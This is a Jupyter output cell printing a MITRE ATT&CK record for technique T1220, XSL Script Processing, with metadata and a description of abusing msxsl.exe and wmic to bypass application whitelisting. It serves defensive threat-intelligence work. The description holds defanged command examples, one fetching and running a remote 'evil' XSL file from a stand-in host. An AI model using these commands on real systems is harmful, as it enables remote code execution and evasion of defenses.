Out[64]:

{'type': 'attack-pattern',
 'id': 'attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3',
 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'created': '2018-10-17 00:14:20.652000+00:00',
 'modified': '2018-10-17 00:14:20.652000+00:00',
 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],
 'url': 'https://attack.mitre.org/techniques/T1220',
 'matrix': 'mitre-attack',
 'technique': 'XSL Script Processing',
 'technique_description': 'Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018)\n\nCommand-line example: (Citation: Penetration Testing Lab MSXSL July 2017)\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file. (Citation: subTee WMIC XSL APR 2018) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool.\n\nCommand-line examples: (Citation: subTee WMIC XSL APR 2018)\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>',
 'tactic': ['defense-evasion', 'execution'],
 'technique_id': 'T1220',
 'platform': ['Windows'],
 'data_sources': ['Process Monitoring',
  'Process command-line parameters',
  'Process use of network',
  'DLL monitoring'],
 'defense_bypassed': ['Anti-virus',
  'Application whitelisting',
  'Digital Certificate Validation'],
 'permissions_required': ['User'],
 'effective_permissions': None,
 'system_requirements': ['Microsoft Core XML Services (MSXML) or access to wmic.exe'],
 'network_requirements': None,
 'remote_support': False,
 'contributors': ['Casey Smith', 'Praetorian'],
 'technique_references': ['https://attack.mitre.org/techniques/T1220',
  'https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script',
  'https://www.microsoft.com/download/details.aspx?id=21714',
  'https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/',
  'https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html',
  'https://twitter.com/dez_/status/986614411711442944',
  'https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/'],
 'detectable_by_common_defenses': None,
 'detectable_explanation': None,
 'difficulty_for_adversary': None,
 'difficulty_explanation': None,
 'tactic_type': None}